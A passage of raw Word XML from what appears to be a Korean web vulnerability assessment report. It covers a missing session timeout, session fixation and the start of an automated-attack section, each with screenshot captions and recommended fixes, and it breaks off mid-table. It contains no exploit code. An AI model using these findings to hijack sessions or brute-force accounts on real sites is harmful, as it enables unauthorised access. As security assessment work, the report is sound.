          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24C803DE" wp14:editId="284927DA">
            <wp:extent cx="4859269" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17780" b="266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8662" r="31262" b="15001"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860802" cy="306096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0E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="467" w:name="_Toc48909168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6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82110E" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>로그인 후 시간 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="467"/>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740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="0082110E" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2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="001E0163" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>1시간 이상을 기다려도 자동 로그 아웃이 안 됨</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="001E0163" w:rsidP="00F0740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21D01" wp14:editId="732F6DC7">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>561976</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1748790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="266700" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="19050" b="2857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7286" id="직사각형 50" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:44.25pt;margin-top:137.7pt;width:21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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00C9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5FC50" wp14:editId="0FED6933">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4286250</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1234440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="828675" cy="361950"/>
                <wp:effectExtent l="0" t="0" r="28575" b="1905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ACD7" id="직사각형 49" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:337.5pt;margin-top:97.2pt;width:65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" filled="f" strokecolor="red" strokeweight="2pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F0740E" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7166E118" wp14:editId="12D63A20">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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" r="42491" b="44727"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860206" cy="306034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0E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="001E0163">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="468" w:name="_Toc48909169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7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1E0163" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>세션 유지 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="468"/>
    </w:p>
    <w:p w:rsidR="001E0163" w:rsidRPr="00C97C1E" w:rsidRDefault="001E0163" w:rsidP="001E0163">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00F0740E">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00C97C1E" w:rsidRDefault="00F0740E" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="469" w:name="_Toc48909056"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="469"/>
    </w:p>
    <w:p w:rsidR="00F0740E" w:rsidRPr="00922158" w:rsidRDefault="00F0740E" w:rsidP="00F0740E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 xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="001E0163" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>세션 종료 시간 설정 또는 자동 로그아웃 기능 구현(세션 종료 시간은 사이트의 특성에 따라 달라질 수 있으므로 사이트의</w:t>
      </w:r>
      <w:r w:rsidR="002F08C6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 특성에 맞게 적정 시간 설정</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00922158" w:rsidRDefault="002F08C6" w:rsidP="00C41B5F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 xml:space="preserve">- 금융권은 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t>10</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>분,</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">일반적인 서버는 </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시간을 권장</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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ASP : 접속자 별로 세션을 생성하여 사용자 정보를 각각 저장할 수 있는 세션 오브젝트를 사용하여 타임 아웃 기능을 구현함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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JSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session.getLastAccessedTime()를 이용하여 세션의 마지막 접근 시간으로부터 일정 시간 이내에 다시 세션에 접근하지 않은 경우 자동으로 세션을 종료하도록 세션 타임아웃 기능을 구현함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="470" w:name="_Toc48909057"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>세션 고정</w:t>
      </w:r>
      <w:bookmarkEnd w:id="470"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="471" w:name="_Toc48909058"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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Pr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자 로그인 시 항상 일정하게 고정된 세션ID가 발행되는 경우 세션ID를 도용한 비</w:t>
      </w:r>
      <w:r w:rsidR="00770CB1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인가자의 접근 및 권한 우회를 가능하게 만듦</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="472" w:name="_Toc48909059"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="472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C41B5F" w:rsidRPr="00C97C1E" w:rsidTr="00C97C1E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41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1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C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1E">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="00922158">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>사이트 모든 경로</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidTr="00C97C1E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41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1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C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>- 최초 한번 세션ID를 발급 받으면</w:t>
            </w:r>
            <w:r w:rsidR="0041530B" w:rsidRPr="00922158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>, 세션ID을 계속 유지함</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="0041530B" w:rsidRPr="00C97C1E" w:rsidRDefault="0041530B" w:rsidP="0041530B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0041530B" w:rsidRPr="00C97C1E" w:rsidRDefault="0041530B" w:rsidP="00C41B5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>사이트 접속 및 로그인 시 세션ID를 발급받음</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5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1284E081" wp14:editId="0EA581D1">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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 r="49617" b="42414"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860830" cy="306074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B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="0041530B">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="473" w:name="_Toc48909170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8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41530B" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>세션ID를 발급</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
    </w:p>
    <w:p w:rsidR="0041530B" w:rsidRPr="00C97C1E" w:rsidRDefault="0041530B" w:rsidP="0041530B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00922158">
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5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="0041530B" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>#2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="0041530B" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>로그 아웃을 해도 세션ID가 유지 되는 것을 확인</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="0041530B">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="800" w:firstLineChars="25" w:firstLine="50"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E71F74E" wp14:editId="75295701">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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" r="49358" b="45480"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860401" cy="306047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B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="474" w:name="_Toc48909171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19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41530B" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>로그아웃 후 세션ID 확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="474"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A07FD7" w:rsidRPr="00C97C1E" w:rsidRDefault="00A07FD7" w:rsidP="00A07FD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3]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>재로그인</w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>을 하여도 같은</w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 세션ID를 </w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>유지함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A07FD7" w:rsidRPr="00C97C1E" w:rsidRDefault="00A07FD7" w:rsidP="00A07FD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01D5003E" wp14:editId="63770BC9">
            <wp:extent cx="4859655" cy="3060000"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="266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 r="49617" b="42414"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4860830" cy="306074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FD7" w:rsidRPr="00922158" w:rsidRDefault="00A07FD7" w:rsidP="00A07FD7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="475" w:name="_Toc48909172"/>
      <w:r w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">[그림 3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20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3B76B6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>재로그인 후 세션ID</w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00922158">
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>확인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="475"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="003B76B6" w:rsidP="003B76B6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C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="476" w:name="_Toc48909060"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>보안대책</w:t>
      </w:r>
      <w:bookmarkEnd w:id="476"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00922158" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F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 xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>사용자가 로그인 할 때마다 예측 불가능한 새로운 세션ID</w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00922158">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="00922158">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>생성 로직을 구현하고 기존 세션ID는 파기하도록 함</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:leftChars="425" w:left="850"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="003B76B6" w:rsidP="003B76B6">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="477" w:name="_Toc48909061"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">3.10 </w:t>
      </w:r>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>자동화 공격</w:t>
      </w:r>
      <w:bookmarkEnd w:id="477"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F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41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F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41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F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41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
        <w:rPr>
          <w:b/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="478" w:name="_Toc48909062"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>취약점 정의</w:t>
      </w:r>
      <w:bookmarkEnd w:id="478"/>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C41B5F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>웹 어플리케이션의 특정 프로세스에 대한 접근 시도 횟수 제한을 설정하지 않아 자동화 공격이 가능한 상태</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B76B6" w:rsidRPr="0070637F" w:rsidRDefault="003B76B6" w:rsidP="00C41B5F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="850"/>
      </w:pPr>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>- 자동화 공격이 가능하면 웹</w:t>
      </w:r>
      <w:r w:rsidR="00F82A42">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>서버를 다운시키거나 무차별 대입 공격으로 인해 사용자 계정을 탈취할 수 있으며,</w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0070637F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>데이터 등록 또는 메일 발송 기능 등을 이용하여 악의적인 활용이 가능</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C41B5F" w:rsidRPr="00C97C1E" w:rsidRDefault="00C41B5F" w:rsidP="00B004BB">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="17"/>
        </w:numPr>
        <w:jc w:val="left"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="479" w:name="_Toc48909063"/>
      <w:r w:rsidRPr="00C97C1E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>상세분석</w:t>
      </w:r>
      <w:bookmarkEnd w:id="479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C41B5F" w:rsidRPr="00C97C1E" w:rsidTr="00C97C1E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41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1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C41B5F" w:rsidRPr="0070637F" w:rsidRDefault="00C41B5F" w:rsidP="00C97C1E">
            <w:pPr>
              <w:widowControl/>
              <w:wordWrap/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
            </w:pPr>
            <w:r w:rsidRPr="0070637F">
              <w:t xml:space="preserve">* </w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>m_bo</w:t>
            </w:r>
            <w:r w:rsidR="003B76B6" w:rsidRPr="0070637F">
